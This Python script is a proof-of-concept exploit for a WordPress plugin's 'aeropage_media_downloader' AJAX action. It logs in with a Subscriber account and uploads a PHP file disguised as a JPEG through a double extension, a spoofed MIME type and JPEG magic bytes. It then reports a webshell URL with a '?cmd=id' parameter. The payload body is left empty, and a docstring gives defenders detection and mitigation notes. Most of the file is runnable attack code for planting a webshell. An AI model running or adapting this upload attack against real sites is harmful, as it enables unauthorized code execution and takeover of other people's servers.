#!/usr/bin/env python3
"""Proof-of-concept for an authenticated file upload through the
``aeropage_media_downloader`` AJAX action of a WordPress site.

The script logs in with a low-privileged (Subscriber) account and posts a
multipart upload whose filename ends in ``.php`` while the declared MIME type
and the leading bytes claim to be a JPEG.

Reviewer notes for defenders (the affected and fixed plugin versions are not
stated on this page):

* Detection: look for POST requests to
  ``/wp-admin/admin-ajax.php?action=aeropage_media_downloader`` from
  Subscriber-level sessions, multipart filenames with a double extension such
  as ``.jpg.php`` sent with an image Content-Type, and newly created ``.php``
  files under the site's upload directories.
* Mitigation: the handler should enforce a capability and nonce check and
  validate the extension and content server-side instead of trusting the
  client-supplied MIME type; upload directories should not execute PHP.
"""
import argparse
import re

import requests


def wp_login(site_url, username, password):
    """Log in through ``wp-login.php`` and return the ``requests`` session.

    The login form is fetched first so that any cookies it sets are stored on
    the session; its body is not parsed.  The response to the login POST is
    not inspected, so the session is returned whether or not the credentials
    were accepted.
    """
    login_url = f"{site_url}/wp-login.php"
    session = requests.Session()

    # Preliminary GET of the login page (the original comment notes a nonce
    # may be needed; none is extracted here).
    session.get(login_url)

    credentials = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In"
    }
    session.post(login_url, data=credentials)
    return session


def exploit(session, target_url):
    """Post the disguised upload and report what the server answered.

    The upload is considered accepted when the response is HTTP 200 and its
    body contains "success" (case-insensitive).  The saved path is read from
    the response with a regex that the original author marks as needing
    adjustment per target, so it may not match.
    """
    upload_url = f"{target_url}/wp-admin/admin-ajax.php?action=aeropage_media_downloader"

    # JPEG magic bytes followed by the script body.  The script body is empty
    # on this page and is left empty here.
    file_bytes = b"\xFF\xD8\xFF\xE0" + b""

    # The filename carries the real extension (.php); the MIME type is what a
    # handler that trusts client metadata would see as an image.
    multipart = {"file": ("shell.jpg.php", file_bytes, "image/jpeg")}

    print(f"[*] Uploading malicious file to {upload_url}")
    response = session.post(upload_url, files=multipart)

    accepted = response.status_code == 200 and "success" in response.text.lower()
    if not accepted:
        print(f"[-] Upload failed (HTTP {response.status_code})")
        return

    print("[+] Exploit succeeded! Webshell uploaded.")
    # Extract upload path from response (adjust regex as needed)
    saved_path = re.search(r"File saved at: (.+?\.php)", response.text)
    if saved_path:
        print(f"[+] Webshell URL: {saved_path.group(1)}?cmd=id")


if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    arg_parser.add_argument("-l", "--login", required=True, help="Subscriber username")
    arg_parser.add_argument("-p", "--password", required=True, help="Subscriber password")
    args = arg_parser.parse_args()

    # Step 1: authenticate as the low-privileged account.
    print(f"[*] Logging in as {args.login}...")
    session = wp_login(args.url, args.login, args.password)

    # Step 2: send the upload request with that session.
    exploit(session, args.url)